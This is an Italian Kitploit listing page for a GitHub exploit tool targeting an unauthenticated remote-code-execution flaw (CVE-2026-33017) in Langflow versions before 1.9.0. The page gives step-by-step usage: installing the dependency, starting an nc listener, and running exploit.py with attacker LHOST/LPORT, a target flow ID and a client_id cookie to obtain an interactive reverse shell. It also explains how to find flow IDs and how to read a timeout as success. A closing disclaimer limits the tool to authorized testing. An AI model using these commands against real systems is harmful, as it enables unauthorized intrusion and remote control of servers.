Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-33017-Exploit — Exploit di RCE non autenticata in Langflow <1.9.0 (CVE-2026-33017) | Kitploit
Strumenti/GitHubGitHub/diamorphine666/cve-2026-33017-exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHubdiamorphine666/cve-2026-33017-exploit

CVE-2026-33017-Exploit

Exploit di RCE non autenticata in Langflow <1.9.0 (CVE-2026-33017)

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
1 mese faNon ancora revisionato

Exploit RCE di Fireflow

Esecuzione di codice remoto per Langflow tramite l'endpoint build_public_tmp.
Exploit tramite l'endpoint Public Flow Build che esegue una reverse shell sul target.

Requisiti

  • Python 3.8+
  • libreria httpx

Installa:

root@kitploit:~
pip install httpx

Utilizzo

root@kitploit:~
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>

Argomenti

  • -u, --url : URL di base dell'istanza Langflow (es., https://flow.example.com/)
  • -l, --lhost : Il tuo indirizzo IP per ricevere la reverse shell
  • -p, --lport : Porta di ascolto per la reverse shell
  • -f --flow-id : ID del flow target (obbligatorio – ottienilo da /api/v1/flows/ o dall'interfaccia utente)
  • -c --client-id : Valore del cookie client_id per l'identificazione della sessione

Esempio

  1. Avvia un listener:

    root@kitploit:~
    nc -nlvp 9001
    
  2. Esegui l'exploit:

    root@kitploit:~
    python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
    
  3. Se ha successo, ottieni una shell bash interattiva.

Note importanti

  • ReadTimeout è normale – il server potrebbe non rispondere perché la shell blocca la richiesta HTTP. Finché vedi una connessione sul tuo listener, l'exploit ha funzionato.
  • È richiesto un flow-id valido. Elenca tutti i flow tramite GET /api/v1/flows o copia dall'URL del browser.
  • Questo strumento è destinato esclusivamente a test di penetrazione autorizzati e scopi educativi. Non utilizzarlo contro sistemi senza autorizzazione esplicita.

Versioni interessate

  • Versioni di Langflow precedenti alla correzione per RCE dei componenti personalizzati <1.9.0

Licenza

MIT – per ricerca sulla sicurezza educativa ed etica.

Scarica lo strumento